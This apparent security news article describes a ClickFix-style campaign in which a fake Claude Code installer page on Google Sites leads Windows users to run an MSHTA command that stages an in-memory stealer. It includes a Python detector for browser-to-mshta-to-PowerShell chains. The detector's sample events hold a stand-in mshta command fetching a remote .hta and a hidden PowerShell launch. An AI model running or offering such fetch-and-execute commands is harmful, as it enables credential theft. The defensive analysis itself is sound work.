When a Fake Installer Becomes the Attack: How Developer Trust Is Being Turned Against Itself
A Google Sites lure impersonating Claude Code shows how ClickFix-style social engineering can push victims into running Windows commands that stage a reported in-memory stealer.
The most effective phishing page does not look criminal. It looks useful. In this case, a fake installer themed around Claude Code and other AI developer tools rode on Google Sites hosting and a ClickFix-style flow designed to make the user do the dangerous part themselves: launch a command on Windows.
Fast Facts
- Fake Claude Code installers have been linked to Google Sites pages.
- The lure imitates developer tools such as Claude Code and Codex.
- The interaction reportedly leads users to run an MSHTA-based command.
- The payload is described as fileless and credential-stealing, with an in-memory stealer staged inside PowerShell.exe.
- No confirmed victim count, named threat actor, or verified breach is established in the available information.
What makes this chain dangerous
Claude Code is a terminal-based coding assistant, which matters because the audience for this lure is already comfortable with installers, commands, and scripts. That familiarity creates a narrow but valuable trust window. A page hosted on a familiar platform can further lower suspicion, especially when it looks like routine setup guidance rather than an obvious phishing kit.
The ClickFix pattern takes advantage of that behavior. Microsoft has described this technique as a social-engineering play that convinces users to copy, paste, or run commands under the guise of a fix, verification step, or access check. The attacker does not need to smash through a perimeter if the victim is persuaded to execute the first command voluntarily.
MITRE ATT&CK tracks mshta.exe abuse as a living-off-the-land pattern under System Binary Proxy Execution. That matters because built-in Windows utilities can blend into normal activity and may be less suspicious than an unfamiliar dropped executable. In the reported chain, the MSHTA step is used as part of the handoff toward PowerShell.exe, where the stealer is said to run in memory.
At this stage, the safest reading is technical, not sensational. The available information supports a risk analysis, not a definitive claim that every target lost credentials or that any specific organization suffered a confirmed breach.
Why defenders should care
This is a reminder that “trusted” is not the same as “safe.” A legitimate hosting surface can be abused as credibility, and a familiar developer workflow can become the lure. From a defensive perspective, the highest-value controls are not only web filtering, but also command-line visibility, application control, and user training that treats any page asking for a pasted command as high risk.
Teams should watch for suspicious parent-child chains involving a browser, mshta.exe, and PowerShell. They should also verify AI tool installers and update commands through official vendor documentation rather than promotional pages or ad hoc setup instructions. If a login prompt, installer, or verification step depends on a copy-pasted command, the burden of proof should shift to the page, not the user.
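The parent-child chain described above can be checked mechanically. The following is an added example, not code from the article or from any vendor: it walks constructed process-creation events (the field names `pid`, `ppid`, `image`, `cmd` are assumptions, not a real log schema) and flags any PowerShell process whose ancestry passes through mshta.exe and then a browser.

```python
# Added example: detect browser -> mshta.exe -> powershell.exe process chains.
# Event records are constructed for illustration; field names are assumptions.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
PROXY = "mshta.exe"
TARGET = "powershell.exe"

# Constructed sample events (one suspicious chain, one benign admin session).
EVENTS = [
    {"pid": "p1", "ppid": "p0", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": "chrome.exe"},
    {"pid": "p2", "ppid": "p1", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/placeholder.hta"},
    {"pid": "p3", "ppid": "p2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c <constructed>"},
    {"pid": "p4", "ppid": "p0", "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": "p5", "ppid": "p4", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Service"},
]


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Image basenames from the given process up to the root, child first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # stop at unknown parent or a cycle
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_clickfix_chains(events):
    """Return PowerShell processes whose ancestors include mshta.exe under a browser."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != TARGET:
            continue
        chain = ancestry(e["pid"], by_pid)
        if PROXY not in chain[1:]:             # chain[0] is powershell itself
            continue
        above_proxy = chain[chain.index(PROXY, 1) + 1:]
        if any(name in BROWSERS for name in above_proxy):
            hits.append({"pid": e["pid"], "chain": " -> ".join(reversed(chain)), "cmd": e["cmd"]})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_chains(EVENTS):
        print(hit)
```

The benign explorer.exe -> powershell.exe session is not flagged, which is the distinction a rule like this needs to make to stay usable on developer workstations.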
Conclusion
The broader lesson is blunt: modern phishing does not always try to steal a click. Sometimes it tries to borrow your judgment. The moment a page asks you to execute code in the name of convenience, the threat is no longer the website alone - it is your own terminal.
WIKICROOK
- ClickFix: A social-engineering technique that nudges users into running malicious commands by presenting them as fixes or verification steps.
- Fileless malware: Malware that runs primarily in memory, leaving little or no obvious file on disk.
- mshta.exe: A built-in Windows utility that can be abused to execute remote or local content through proxy execution.
- PowerShell.exe: A Windows scripting and automation environment often targeted for payload staging and command execution.
- Living-off-the-land binary: A legitimate system tool abused by attackers to blend malicious actions into normal administration.